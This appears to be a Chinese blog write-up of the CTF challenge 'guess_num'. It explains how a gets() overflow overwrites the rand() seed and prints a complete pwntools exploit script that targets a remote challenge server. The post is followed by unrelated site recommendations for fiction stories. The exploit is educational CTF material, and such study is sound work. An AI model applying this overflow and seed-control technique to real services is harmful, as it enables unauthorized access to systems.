guess_num

image.png

0x00 `file`和`checksec`

image.png

0x01 ida查看

image.png

程序基本邏輯是生成隨機(jī)數(shù)，然后猜，連續(xù)猜中10次便可得到flag
發(fā)現(xiàn)v7使用了gets危險(xiǎn)函數(shù)臣缀，而且可以覆蓋seed
所以就有了思路怖现，seed能夠被控制的話扛拨，那隨機(jī)數(shù)也就相當(dāng)于可以控制了蛤奥，具體的可以查看srand点弯、rand盐碱、seed的關(guān)系

0x02 完整`exp`

from pwn import *
from ctypes import *

local=0
pc='./guess_num'
aslr=True
context.log_level=True
context.terminal = ["deepin-terminal","-x","sh","-c"]

libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

if local==1:
    #p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'})
    p = process(pc,aslr=aslr)
   # gdb.attach(p,'c')
else:
    remote_addr=['111.198.29.45', 45968]
    p=remote(remote_addr[0],remote_addr[1])

ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda   : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)

def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

def raddr(a=6):
    if(a==6):
        return u64(rv(a).ljust(8,'\x00'))
    else:
        return u64(rl().strip('\n').ljust(8,'\x00'))

if __name__ == '__main__':
    payload = ''
    payload += 'A'*0x20
    payload += p64(1)
    sla('Your name:', payload)

    for i in range(0,10):
        num = str(libc.rand()%6+1)
        sla('number:', num)
    p.interactive()

0x03 結(jié)果

image.png

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末楼誓，一起剝皮案震驚了整個(gè)濱河市玉锌，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌疟羹，老刑警劉巖主守，帶你破解...
沈念sama閱讀 207,248評論 6贊 481
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場離奇詭異榄融，居然都是意外死亡参淫，警方通過查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 88,681評論 2贊 381
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門愧杯，熙熙樓的掌柜王于貴愁眉苦臉地迎上來涎才，“玉大人，你說我怎么就攤上這事力九∷Ｍ” “怎么了？”我有些...
開封第一講書人閱讀 153,443評論 0贊 344
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵跌前，是天一觀的道長业扒。經(jīng)常有香客問我，道長舒萎，這世上最難降的妖魔是什么程储？我笑而不...
開封第一講書人閱讀 55,475評論 1贊 279
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮臂寝，結(jié)果婚禮上章鲤，老公的妹妹穿的比我還像新娘。我一直安慰自己咆贬，他們只是感情好败徊，可當(dāng)我...
茶點(diǎn)故事閱讀 64,458評論 5贊 374
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布。她就那樣靜靜地躺著掏缎，像睡著了一般皱蹦。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上眷蜈，一...
開封第一講書人閱讀 49,185評論 1贊 284
城市分裂傳說
那天沪哺，我揣著相機(jī)與錄音，去河邊找鬼酌儒。笑死辜妓，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播籍滴，決...
沈念sama閱讀 38,451評論 3贊 401
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼酪夷，長吁一口氣：“原來是場噩夢啊……” “哼！你這毒婦竟也來了孽惰？” 一聲冷哼從身側(cè)響起晚岭，我...
開封第一講書人閱讀 37,112評論 0贊 261
萬榮殺人案實(shí)錄
序言：老撾萬榮一對情侶失蹤，失蹤者是張志新（化名）和其女友劉穎勋功，沒想到半個(gè)月后坦报，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 43,609評論 1贊 300
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡酝润，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 36,083評論 2贊 325
?白月光啟示錄
正文我和宋清朗相戀三年燎竖，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了璃弄。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片要销。...
茶點(diǎn)故事閱讀 38,163評論 1贊 334
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖夏块，靈堂內(nèi)的尸體忽然破棺而出疏咐，到底是詐尸還是另有隱情，我是刑警寧澤脐供，帶...
沈念sama閱讀 33,803評論 4贊 323
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布浑塞，位于F島的核電站，受9級特大地震影響政己，放射性物質(zhì)發(fā)生泄漏酌壕。R本人自食惡果不足惜，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 39,357評論 3贊 307
男人毒藥：我在死后第九天來索命
文/蒙蒙一歇由、第九天我趴在偏房一處隱蔽的房頂上張望卵牍。院中可真熱鬧，春花似錦沦泌、人聲如沸糊昙。這莊子的主人今日做“春日...
開封第一講書人閱讀 30,357評論 0贊 19
一樁弒父案谢谦，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽释牺。三九已至，卻和暖如春回挽，著一層夾襖步出監(jiān)牢的瞬間没咙，已是汗流浹背。一陣腳步聲響...
開封第一講書人閱讀 31,590評論 1贊 261
情欲美人皮
我被黑心中介騙來泰國打工千劈，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留镜撩，地道東北人。一個(gè)月前我還...
沈念sama閱讀 45,636評論 2贊 355
代替公主和親
正文我出身青樓，卻偏偏與公主長得像袁梗，于是被迫代替她去往敵國和親宜鸯。傳聞我的和親對象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 42,925評論 2贊 344

guess_num

0x00 file和checksec

0x01 ida查看

0x02 完整exp

0x03 結(jié)果

推薦閱讀更多精彩內(nèi)容

0x00 `file`和`checksec`

0x02 完整`exp`